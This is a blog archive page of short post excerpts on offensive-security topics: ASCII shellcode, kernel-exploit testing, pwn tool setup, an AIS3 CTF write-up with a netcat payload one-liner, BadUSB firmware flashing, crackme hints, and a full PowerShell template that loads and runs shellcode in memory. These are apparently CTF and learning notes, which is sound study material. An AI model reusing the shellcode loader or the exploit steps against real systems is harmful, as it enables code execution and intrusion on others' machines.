Ascii shellcode

You can use the alpha3 tool, which produces ascii shellcode that includes an encoder — it uses its own encoder to decode. The resulting shellcode is very short, but this kind of shellcode needs a reg pointing to the start of the shellcode. Some other variants xor by offset and finally jmp esp to execute. Here’s a write-up of one challenge’s solution: Use a position on the stack together with a ROP ret to jump to that position, then xor the values on the stack against eax, using op codes like xor al,[esp+0x34]; the offset part is padded with push eax, so that eax ends up pointing exactly at our shellcode’s location. ...

February 9, 2016

zshrc

After using zsh frameworks like prezto and oh-my-zsh, they’re convenient but load a pile of plugins and data by default, which makes opening a shell feel laggy — especially when entering a huge git folder, it gets painfully slow. I tried writing my own zshrc with just what I use, and the speed improved a lot. For git I take a better approach: first write the git info that would go to the Prompt into a tmp file, and once it finishes, pull the data back into the Prompt. ...

February 7, 2016

Linux kernel exploits tested

Search: aptitude search linux-image- Install: aptitude install linux-image-xxxx Or find and download a .deb file online and install it: wget http://kr.archive.ubuntu.com/ubuntu/pool/main/l/linux-lts-utopic/linux-image-3.16.0-30-generic_3.16.0-30.40~14.04.1_amd64.deb sudo dpkg -i *.deb Check the kernel install history: dpkg --get-selections | grep linux-image Remove an old kernel: aptitude remove linux-image-3.19.0-18-generic linux kernel exploits db https://www.kernel-exploits.com/

January 5, 2016

PWN tool list

ub 14.04 x64 i32 lib apt-get install gcc-multilib cd /etc/apt/sources.list.d echo "deb http://old-releases.ubuntu.com/ubuntu/ raring main restricted universe multiverse" >ia32-libs-raring.list apt-get update apt-get install ia32-libs dpkg --add-architecture i386 apt-get update apt-get install libssl-dev:i386 PEDA apt-get install nasm micro-inetd apt-get install libc6-dbg https://github.com/longld/peda qira https://github.com/BinaryAnalysisPlatform/qira pwntools Includes checksec and ROPgadget tools sudo pip install git+https://github.com/Gallopsled/pwntools#egg=pwntools fix bug cp /usr/local/lib/python2.7/dist-packages/usr/lib/python2.7/dist-packages/capstone/libcapstone.so /usr/local/lib/python2.7/dist-packages/capstone/. rp++ https://github.com/0vercl0k/rp/downloads ncat sudo apt-get install netcat-traditional netcat-openbsd nmap

November 25, 2015

AIS3 PWN

A quick write-up. PWN1 Throw it into IDA and you can see: if ( v4 == 0x90909090 ) result = puts(aCensordCensord); else result = printf("Your point is only %d, try hard!\n", v4, v1, v2, v3); return result; Just stuff it with 0x90 and you’re done: python -c 'print "\x90"*1000' | nc 52.69.163.194 1111 PWN2 After locating byte 20 you can control eip: gdb-peda$ info functions All defined functions: Non-debugging symbols: 0x08048364 _init 0x080483a0 read@plt You can point it at read; generally it looks like this: ...

November 24, 2015

BadUSB

https://slides.com/zettain/bad-usb https://github.com/adamcaudill/Psychson Supported devices Patriot 8GB Supersonic Xpress* Kingston DataTraveler 3.0 T111 8GB Silicon power marvel M60 64GB Patriot Stellar 64 Gb Phison Toshiba TransMemory-MX USB 3.0 16GB Toshiba TransMemory-MX USB 3.0 8GB Kingston DataTraveler G4 64 GB Patriot PSF16GXPUSB Supersonic Xpress 16GB Silicon Power 32GB Blaze B30 (SP032GBUF3B30V1K) Kingston Digital 8GB USB 3.0 DataTraveler Getting the chip model Download the firmware and flashing files Firmware PS2251-03 flash chip http://www.usbdev.ru/?wpfb_dl=777 ...

April 12, 2015

HackThisSite Application Missions

app1 Hint:HEX app2 Hint:HEX app4 Hint: VB decompile, patch with OllyDbg Hint: OllyDbg window plugin app5 Hint: the answer is also present near ebp 0040109C 8B4D E0 mov ecx,dword ptr ss:[ebp-20] ; algorithm start 0040109F 83C1 04 add ecx,4 004010A2 894D E0 mov dword ptr ss:[ebp-20],ecx 004010A5 8B55 DC mov edx,dword ptr ss:[ebp-24] 004010A8 83EA 01 sub edx,1 004010AB 8955 DC mov dword ptr ss:[ebp-24],edx 004010AE 837D E0 0D cmp dword ptr ss:[ebp-20],0D 004010B2 73 28 jnb short app5win.004010DC 004010B4 8B45 E0 mov eax,dword ptr ss:[ebp-20] 004010B7 C1E8 02 shr eax,2 004010BA 8B4D F8 mov ecx,dword ptr ss:[ebp-8] 004010BD 8B55 DC mov edx,dword ptr ss:[ebp-24] 004010C0 8B0481 mov eax,dword ptr ds:[ecx+eax*4] 004010C3 3B4495 E8 cmp eax,dword ptr ss:[ebp+edx*4-18] ; compare ascii, watch the stack 004010C7 74 11 je short app5win.004010DA 004010C9 68 4C704000 push app5win.0040704C ; invalid password 004010CE E8 20000000 call app5win.004010F3 004010D3 83C4 04 add esp,4 004010D6 33C0 xor eax,eax 004010D8 EB 15 jmp short app5win.004010EF 004010DA ^ EB C0 jmp short app5win.0040109C ; loop back 004010DC 8D4D CC lea ecx,dword ptr ss:[ebp-34] 004010DF 51 push ecx 004010E0 68 60704000 push app5win.00407060 ; the password is %s\n app6 Hint: same as app5 ...

July 23, 2013

Use PowerShell to launch shellcode

A template for executing shellcode: $code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = SHELLCOD;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = $sc.Length};$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 }; The SHELLCOD part is the placeholder to replace. ...

March 18, 2013